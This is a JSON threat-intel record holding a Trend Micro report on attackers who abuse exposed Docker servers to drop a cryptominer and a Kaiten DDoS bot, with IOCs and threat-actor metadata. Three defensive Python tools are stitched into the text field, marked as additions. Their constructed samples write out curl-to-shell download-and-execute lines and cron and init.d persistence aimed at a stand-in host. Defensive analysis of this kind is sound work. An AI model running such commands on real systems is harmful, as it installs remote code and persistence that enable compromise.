{
	"id": "0b5d9f12-98f6-4039-9f51-3b266f707e72",
	"created_at": "2026-04-06T00:18:07.229762Z",
	"updated_at": "2026-04-10T03:34:59.814095Z",
	"deleted_at": null,
	"sha1_hash": "9a674b28b8097680f722658c467ce4e4f4d4c1d6",
	"title": "Exposed Docker Server Abused to Drop Cryptominer DDoS Bot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 854645,
	"plain_text": "Exposed Docker Server Abused to Drop Cryptominer DDoS Bot\r\nBy: Augusto Remillano II, Sep 08, 2020. Read time: 4 min (988 words)\r\nPublished: 2020-09-08 · Archived: 2026-04-05 16:13:12 UTC\r\nMalicious actors continue to target environments running Docker containers. We recently encountered an attack that drops both a malicious cryptocurrency miner and a distributed denial-of-service (DDoS) bot on a Docker container built using Alpine Linux as its base image. A similar attack was also reported by Trend Micro in May; in that previous attack, threat actors created a malicious Alpine Linux container to host a malicious cryptocurrency miner and a DDoS bot.\r\nInfection chain analysis\r\nIn this recent attack, the infection starts with threat actors connecting to an exposed Docker server and then creating and running a Docker container. On the Docker container, the command shown in Figure 1 is executed.\r\nFigure 1. A code snippet of the command that is executed on the Docker container\r\nThe XMI download file (detected by Trend Micro as Trojan.Linux.MALXMR.USNELH820) is a Bash script, shown in Figure 2, that moves laterally to other hosts in the same container network using information from /.ssh/known_hosts.\r\nFigure 2. A code snippet of the Bash script used in the attack\r\nThe commands shown in Figure 3 download and execute the XMI Bash script and a Python script named “d.py” (Trojan.Python.MALXMR.D).\r\nFigure 3. A code snippet of the commands sent to targets\r\nThe XMI shell script extensively uses Base64 encoding to avoid detection. 
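Peeling the Base64 layers described above, as an added example that is not code from the original report or from the malware itself: a small triage routine that recursively decodes any Base64 blob piped into a shell, then lists the download URLs and the persistence commands (cron, /etc/init.d) that surface in each layer. The dropper it runs on is constructed inside the block with a TEST-NET address (203.0.113.10) and a made-up service name; it is not the XMI script.

```python
import base64
import re

# A Base64 blob handed to base64 -d and piped into a shell: the construct the
# dropper uses to hide its real commands.  Each match is decoded and scanned
# again, because layers can nest.
B64_PIPE = re.compile(
    r'echo[ ]+(?:-n[ ]+)?([A-Za-z0-9+/=]{16,})[ ]*[|][ ]*base64[ ]+'
    r'(?:-d|--decode)[ ]*[|][ ]*(?:ba)?sh')
URL = re.compile(r'https?://[^ ;|)]+')
# Persistence markers seen in this attack: cron jobs and an /etc/init.d service.
PERSISTENCE = ['crontab', '/etc/cron', '/etc/init.d']


def unpack_layers(script, max_depth=5):
    '''Return [(depth, text), ...] for the script and every decoded layer.'''
    layers = []
    pending = [(0, script)]
    while pending:
        depth, text = pending.pop()
        layers.append((depth, text))
        if depth >= max_depth:
            continue
        for blob in B64_PIPE.findall(text):
            try:
                decoded = base64.b64decode(blob, validate=True)
            except ValueError:
                continue
            pending.append((depth + 1, decoded.decode('utf-8', 'replace')))
    return layers


def triage(script):
    '''Summarise what the script does once all Base64 layers are removed.'''
    findings = {'layers': 0, 'urls': set(), 'persistence': []}
    for depth, text in unpack_layers(script):
        findings['layers'] = max(findings['layers'], depth + 1)
        findings['urls'].update(URL.findall(text))
        for line in text.splitlines():
            for marker in PERSISTENCE:
                if marker in line:
                    findings['persistence'].append((depth, line.strip()))
                    break
    findings['urls'] = sorted(findings['urls'])
    return findings


def b64(text):
    return base64.b64encode(text.encode()).decode()


NL = chr(10)
# Constructed sample (not the real dropper): three layers in the same shape.
INNER = 'curl -fsSL http://203.0.113.10/d.py -o /tmp/d.py; python /tmp/d.py'
SERVICE = ('printf placeholder > /etc/init.d/svc-example; '
           'chmod +x /etc/init.d/svc-example; /etc/init.d/svc-example start')
MIDDLE = ('echo ' + b64(INNER) + ' | base64 -d | bash' + NL +
          'echo ' + b64(SERVICE) + ' | base64 -d | sh')
SAMPLE = ('#!/bin/bash' + NL +
          '(crontab -l 2>/dev/null; echo 0 * * * * curl -fsSL '
          'http://203.0.113.10/xmi | sh) | crontab -' + NL +
          'echo ' + b64(MIDDLE) + ' | base64 -d | bash' + NL)


if __name__ == '__main__':
    for key, value in triage(SAMPLE).items():
        print(key, value)
```

On the constructed sample the routine reports three layers, two download URLs, and two persistence commands, one at the outermost layer (the cron job) and one only visible after two rounds of decoding (the init.d service). The same approach applies to the real script: decode rather than pattern-match the outer text, because the indicators live in the inner layers.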
Decoding the encoded string shown in Figure 3 yields the command shown in Figure 4, which downloads and executes d.py.\r\nFigure 4. A code snippet of the decoded command that downloads and executes the component named “d.py”\r\nIt is also worth noting that the shell script contains commented-out code, shown in Figure 5, that seems to be used for propagating the malware via SSH brute-forcing. It is likely that the actors behind this attack used to target or are also targeting SSH servers.\r\nFigure 5. A code snippet of the commented-out code found in the XMI Bash script\r\nThe attack uses multiple techniques to establish persistence. Aside from setting up cron jobs, as shown in Figure 6, it also creates its own service for automatic payload execution.\r\nFigure 6. A code snippet of the attack setting up persistence using cron jobs\r\nThe portion that creates the service is also Base64-encoded. Its decoded form, shown in Figure 7, is placed in the /etc/init.d directory.\r\nFigure 7. A code snippet of the decoded form of the script, which is placed in the /etc/init.d directory\r\nWe detect the cryptocurrency-mining payload, whose download script is shown in Figure 8, as Coinminer.Linux.MALXMR.UWELD. Interestingly, the cryptocurrency wallet used by the threat actors is the same one used in campaigns that exploited vulnerabilities such as CVE-2019-3396, a Confluence vulnerability, and CVE-2017-5638, an Apache Struts vulnerability. According to a report by Tencent Security, the 8220 mining group, a criminal gang based in China, is behind the campaign that exploited CVE-2017-5638.\r\nFigure 8. 
A code snippet of the cryptocurrency-mining payload download\r\nTo check whether the payload has been successfully dropped, the malware uses md5sum, a program that calculates and verifies 128-bit MD5 hashes. This verification method is similar to the one used by the Kinsing malware, which was used by the H2Miner cryptocurrency-mining botnet that targeted cloud servers in China.\r\nIn addition, the attack drops another payload in the form of a DDoS bot (Backdoor.Linux.KAITEN.AMV), as shown in Figure 9.\r\nFigure 9. A code snippet of the dropper script that downloads and executes a DDoS bot\r\nThis DDoS bot, some of whose backdoor commands are shown in Figure 10, is based on IRC (Internet Relay Chat) and appears to be a variant of Kaiten (aka Tsunami). Its command-and-control (C\u0026C) servers are c4k[.]xpl[.]pwndns[.]pw, 104[.]244[.]75[.]25, and 107[.]189[.]11[.]170.\r\nFigure 10. A code snippet of strings found in the DDoS bot showing some of its backdoor commands\r\nAs previously mentioned, the attack also drops d.py, the Python script that we detect as Trojan.Python.MALXMR.D. We found that it performs the same routine as Trojan.Linux.MALXMR.USNELH820, that is, it establishes persistence and drops cryptocurrency miner and DDoS bot payloads. A code snippet of d.py is shown in Figure 11.\r\nFigure 11. A code snippet of the d.py Python script\r\nThe infection chain of the attack is illustrated in Figure 12.\r\nFigure 12. A diagram of the infection chain of the attack\r\nSecurity recommendations\r\nAs Docker containers become increasingly targeted by malicious actors, development teams should adopt a risk-based security approach to reduce containers’ exposure to threats. They can start by not leaving their Docker daemon ports exposed online. 
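One concrete way to check that first recommendation, as an added example that is not part of the original post: audit how dockerd is bound, from both daemon.json and the running command line, and rate every tcp:// listener by the interface it binds and whether client certificates are required. The sample configurations below are constructed; only the dockerd flags (-H/--host, --tls, --tlsverify) and the daemon.json keys (hosts, tls, tlsverify, tlscacert, tlscert, tlskey) are real Docker options.

```python
import ipaddress
import json
import shlex


def hosts_from_cmdline(cmdline):
    '''Collect every -H / --host value from a dockerd command line.'''
    args = shlex.split(cmdline)
    hosts, i = [], 0
    while i < len(args):
        arg = args[i]
        if arg in ('-H', '--host') and i + 1 < len(args):
            hosts.append(args[i + 1])
            i += 1
        elif arg.startswith('--host='):
            hosts.append(arg[len('--host='):])
        elif arg.startswith('-H') and len(arg) > 2:
            hosts.append(arg[2:])
        i += 1
    return hosts


def parse_tcp(host):
    '''Split tcp://addr:port into (addr, port); port may be empty.'''
    rest = host[len('tcp://'):]
    if rest.startswith('['):                      # bracketed IPv6 literal
        addr, _, tail = rest[1:].partition(']')
        return addr, tail.lstrip(':')
    addr, sep, port = rest.rpartition(':')
    return (addr, port) if sep else (rest, '')


def exposure(addr):
    if addr in ('', '0.0.0.0', '::', '*'):
        return 'all interfaces'
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return 'hostname (resolve it before trusting this result)'
    return 'loopback' if ip.is_loopback else 'one interface'


def audit(daemon_json_text, cmdline):
    '''Rate every listener.  Returns [(severity, host, reason), ...].'''
    cfg = json.loads(daemon_json_text) if daemon_json_text.strip() else {}
    args = shlex.split(cmdline)
    tlsverify = bool(cfg.get('tlsverify')) or '--tlsverify' in args
    tls = bool(cfg.get('tls')) or '--tls' in args or tlsverify
    # dockerd refuses to start when hosts is set in both places, so merging is safe.
    hosts = list(cfg.get('hosts', [])) + hosts_from_cmdline(cmdline)
    findings = []
    for host in hosts:
        if not host.startswith('tcp://'):
            findings.append(('ok', host, 'local socket; guarded by file permissions'))
            continue
        addr, port = parse_tcp(host)
        where = exposure(addr)
        if where == 'loopback':
            findings.append(('low', host, 'TCP on loopback only'))
        elif tlsverify:
            findings.append(('medium', host, 'remote API on ' + where + '; client certificate required'))
        elif tls:
            findings.append(('high', host, 'remote API on ' + where + '; TLS but no client verification'))
        else:
            findings.append(('critical', host, 'unauthenticated remote API on ' + where + ', port ' + (port or '2375')))
    return findings


SEVERITY = ['ok', 'low', 'medium', 'high', 'critical']


def worst(findings):
    return max((f[0] for f in findings), key=SEVERITY.index, default='ok')


# Constructed samples: the exposed shape behind this attack, and a hardened one.
EXPOSED_CMDLINE = 'dockerd -H fd:// -H tcp://0.0.0.0:2375'
HARDENED_JSON = json.dumps({
    'hosts': ['unix:///var/run/docker.sock', 'tcp://0.0.0.0:2376'],
    'tlsverify': True,
    'tlscacert': '/etc/docker/ca.pem',
    'tlscert': '/etc/docker/server-cert.pem',
    'tlskey': '/etc/docker/server-key.pem',
})

if __name__ == '__main__':
    for case in (audit('', EXPOSED_CMDLINE), audit(HARDENED_JSON, 'dockerd')):
        print(worst(case), case)
```

The distinction between --tls and --tlsverify matters: --tls alone encrypts the connection but still lets any client create containers, which is exactly the first step of the infection chain above. Even with client certificates required, a remote listener is rated medium here because anyone holding a valid client key has root-equivalent control of the host.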
They should also use only official Docker images to ward off threats such as the ones discussed in this post.\r\nThe following best practices could further mitigate risks to their containers:\r\nDeploy an application firewall to help secure containers and catch threats before they can enter the environment.\r\nMinimize the use of third-party software and use verifiable software to ensure malware is not introduced to the container environment.\r\nImplement the principle of least privilege. Container images should be signed and authenticated. Network connections and access to critical components (such as the daemon service that helps run containers) should be restricted.\r\nEmploy automated runtime and image scanning to gain further visibility into a container’s processes. Application control and integrity monitoring help catch anomalous modifications on servers, files, and system areas.\r\nEnterprises can also rely on the following cloud security solutions to protect their Docker containers:\r\nTrend Micro Hybrid Cloud Security: Provides automated security and protects physical, virtual, and cloud workloads\r\nTrend Micro Cloud One™ – Container Security: Performs automated container image and registry scanning\r\nTrend Micro Deep Security™ Software and Trend Micro Deep Security Smart Check – Container Image Scanning: Scan container images to detect malware and vulnerabilities earlier in the development life cycle\r\nWith additional analysis from Arianne Grace Dela Cruz. 
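The integrity-monitoring recommendation above, applied to the exact locations this attack writes to, as an added example that is not part of the original post: snapshot the cron and /etc/init.d directories, diff a later snapshot against the baseline, and match every file hash against the SHA-256 indicators from the IOC table of this report. The scenario it replays is constructed in a temporary directory (the file names, cron line and TEST-NET address are made up; the watched cron spool paths are an assumed host layout).

```python
import hashlib
import os
import tempfile

# SHA-256 values from the IOC table of this report, keyed for lookup.
REPORT_IOCS = {
    '29316f604f3c0994e8733ea43da8e0e81a559160f5c502fecbb15a71491faf64': 'd.py (Trojan.Python.MALXMR.D)',
    '35e45d556443c8bf4498d8968ab2a79e751fc2d359bf9f6b4dfd86d417f17cfb': 'i686 (Coinminer.Linux.MALXMR.UWELD)',
    '9b8280f5ce25f1db676db6e79c60c07e61996b2b68efa6d53e017f34cbf9a872': 'x32b (Backdoor.Linux.KAITEN.AMV)',
    '855557e415b485cedb9dc2c6f96d524143108aff2f84497528a8fcddf2dc86a2': 'x64b (Backdoor.Linux.KAITEN.AMV)',
    'fdc7920b09290b8dedc84c82883b7a1105c2fbad75e42aea4dc165de8e1796e3': 'x86_64 (Coinminer.Linux.MALXMR.UWELD)',
    '51654c52e574fd4ebda83c107bedeb0965d34581d4fc095bbb063ecefef08221': 'xmi (Trojan.Linux.MALXMR.USNELH82)',
}

# Persistence locations this attack writes to (cron and /etc/init.d), plus the
# cron spool paths used by Alpine and most other distributions (assumed layout).
WATCHED = ['etc/cron.d', 'etc/crontabs', 'var/spool/cron', 'etc/init.d']


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, 'rb') as fh:
        for chunk in iter(lambda: fh.read(65536), b''):
            digest.update(chunk)
    return digest.hexdigest()


def snapshot(root, subdirs=WATCHED):
    '''Map relative path -> sha256 for every regular file under root/subdir.'''
    state = {}
    for sub in subdirs:
        for dirpath, _, names in os.walk(os.path.join(root, sub)):
            for name in names:
                full = os.path.join(dirpath, name)
                if os.path.isfile(full):
                    rel = os.path.relpath(full, root).replace(os.sep, '/')
                    state[rel] = sha256_file(full)
    return state


def compare(baseline, current, iocs=REPORT_IOCS):
    '''Diff two snapshots and flag any file whose hash is a known indicator.'''
    return {
        'added': sorted(set(current) - set(baseline)),
        'removed': sorted(set(baseline) - set(current)),
        'modified': sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        'ioc_hits': sorted((p, iocs[h]) for p, h in current.items() if h in iocs),
    }


def write(root, rel, text):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, 'w') as fh:
        fh.write(text)
    return path


NL = chr(10)


def demo():
    '''Constructed scenario: baseline a clean host, then replay the dropper
    adding a cron line and an init.d service, and report the difference.'''
    with tempfile.TemporaryDirectory() as root:
        write(root, 'etc/cron.d/backup', '0 2 * * * root /usr/local/bin/backup' + NL)
        write(root, 'etc/init.d/sshd', '#!/sbin/openrc-run' + NL)
        baseline = snapshot(root)
        write(root, 'etc/cron.d/backup', '0 2 * * * root /usr/local/bin/backup' + NL +
              '* * * * * root curl -fsSL http://203.0.113.10/xmi | sh' + NL)
        write(root, 'etc/init.d/svc-example', '#!/bin/sh' + NL + 'python /tmp/d.py &' + NL)
        return compare(baseline, snapshot(root))


def ioc_hit_demo():
    '''Exercise the hash-match path with a constructed indicator set (the real
    samples are not reproduced here).'''
    with tempfile.TemporaryDirectory() as root:
        path = write(root, 'etc/init.d/x64b', 'constructed stand-in, not the real sample')
        fake_iocs = {sha256_file(path): 'x64b (constructed test indicator)'}
        return compare({}, snapshot(root), fake_iocs)


if __name__ == '__main__':
    print(demo())
    print(ioc_hit_demo())
```

Run against a real host, the baseline should be taken from a known-good image and stored off the host, since the dropper runs as root and could rewrite a local baseline along with the cron file. Hash matching catches only the exact samples listed; the snapshot diff is what catches the next variant.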
\r\nIndicators of compromise (IOCs)\r\nFile name | SHA-256 | Detection name\r\nd.py | 29316f604f3c0994e8733ea43da8e0e81a559160f5c502fecbb15a71491faf64 | Trojan.Python.MALXMR.D\r\ni686 | 35e45d556443c8bf4498d8968ab2a79e751fc2d359bf9f6b4dfd86d417f17cfb | Coinminer.Linux.MALXMR.UWELD\r\nx32b | 9b8280f5ce25f1db676db6e79c60c07e61996b2b68efa6d53e017f34cbf9a872 | Backdoor.Linux.KAITEN.AMV\r\nx64b | 855557e415b485cedb9dc2c6f96d524143108aff2f84497528a8fcddf2dc86a2 | Backdoor.Linux.KAITEN.AMV\r\nx86_64 | fdc7920b09290b8dedc84c82883b7a1105c2fbad75e42aea4dc165de8e1796e3 | Coinminer.Linux.MALXMR.UWELD\r\nxmi | 51654c52e574fd4ebda83c107bedeb0965d34581d4fc095bbb063ecefef08221 | Trojan.Linux.MALXMR.USNELH82\r\nURL\r\n205[.]185[.]113[.]151\r\nSource: https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html"
	],
	"report_names": [
		"exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html"
	],
	"threat_actors": [
		{
			"id": "0b8ea9bb-b729-438a-ae1f-4240db936fd7",
			"created_at": "2023-06-23T02:04:34.839947Z",
			"updated_at": "2026-04-10T02:00:04.99239Z",
			"deleted_at": null,
			"main_name": "8220 Gang",
			"aliases": [
				"8220 Mining Group",
				"Returned Libra",
				"Water Sigbin"
			],
			"source_name": "ETDA:8220 Gang",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7618565f-b8b8-4e33-b25e-3e89fdc444dd",
			"created_at": "2023-01-06T13:46:39.434955Z",
			"updated_at": "2026-04-10T02:00:03.326016Z",
			"deleted_at": null,
			"main_name": "Returned Libra",
			"aliases": [
				"8220 Mining Group"
			],
			"source_name": "MISPGALAXY:Returned Libra",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a6c351ea-01f1-4c9b-af75-cfbb3b269ed3",
			"created_at": "2023-01-06T13:46:39.390649Z",
			"updated_at": "2026-04-10T02:00:03.311299Z",
			"deleted_at": null,
			"main_name": "Kinsing",
			"aliases": [
				"Money Libra"
			],
			"source_name": "MISPGALAXY:Kinsing",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434687,
	"ts_updated_at": 1775792099,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9a674b28b8097680f722658c467ce4e4f4d4c1d6.pdf",
		"text": "https://archive.orkl.eu/9a674b28b8097680f722658c467ce4e4f4d4c1d6.txt",
		"img": "https://archive.orkl.eu/9a674b28b8097680f722658c467ce4e4f4d4c1d6.jpg"
	}
}